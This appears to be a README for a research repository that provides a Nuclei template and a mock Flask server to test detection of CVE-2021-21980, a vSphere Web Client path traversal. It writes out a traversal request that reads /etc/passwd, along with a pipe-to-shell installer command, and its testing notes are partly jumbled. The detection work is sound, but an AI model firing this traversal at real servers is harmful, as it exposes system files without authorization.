Share
## https://sploitus.com/exploit?id=FB7F6340-D6DB-5C56-9E7E-BD45A41EE5DA
Clippy of the Dead - CVE-2021-21980 testing environment and Nuclei template
=======================================================================

This repository contains a high-confidence Nuclei template to detect CVE-2021-21980
(vSphere Web Client path traversal) and a small mock environment that reproduces
the vulnerable behavior for safe local testing.

Files:
- `cve-2021-21980.yaml`: Nuclei template with multiple encoding variants and matchers
- `app.py`: A small Flask app simulating /eam/vib path traversal vulnerability
- `Dockerfile`: Container image for the mock server with a self-signed TLS cert
- `docker-compose.yml`: Runs the mock server listening on host 8443
- `requirements.txt`: Python dependencies

Disclaimer
----------
- This repository is for research, testing and defensive purposes only. Do not
  use against any system you are not authorized to scan.
- This mock server is *not* VMware vCenter; it only simulates the vulnerable
  behavior for safe PoC/testing.

How to run locally (Windows PowerShell example)
----------------------------------------------

1) Build and run the mock container:

```powershell
cd C:\Users\gui\Documents\hi
docker-compose up --build -d
```

The mock server will listen on `https://localhost:8443` (self-signed TLS certificate).

2) Quick curl check (insecure flag because self-signed cert):

```powershell
curl -k "https://localhost:8443/"  # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
```

You should receive the content of the mock `/app/sensitive/passwd-mock` file.

3) Run Nuclei (install Nuclei first) to validate the template against the mock server:

```powershell
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
```

4) Output should show a match for the PoC if successful.

Testing notes
-------------
- If you want to test many encoding variants, set the Nuclei template to run with high verbosity.
- This mock server returns the mock file which replicates /etc/passwd; in a real environment
  Automated test script
  ---------------------
  Run `run_local_test.ps1` which builds, waits for readiness and executes the curl checks, plus Nuclei if available.

  ```powershell
  powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
  ```

  Install Nuclei on Windows (quick):

  1) Using Scoop (recommended):
  ```powershell
  iwr -useb get.scoop.sh | iex
  scoop install coreutils
  scoop install nuclei
  ```

  2) Or download from releases and add to PATH:
  ```powershell
  Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
  Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
  Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
  ```

  Notes
  -----
  If `nuclei` is not in PATH the `run_local_test.ps1` will execute up to the curl tests only.  
  If you get issue building docker image ensure Docker Desktop is installed and the 'Use the WSL 2 based engine' is enabled.
  /etc/passwd or similar file will be returned if the server is vulnerable.

Security: Always have explicit authorization before scanning or exploiting systems.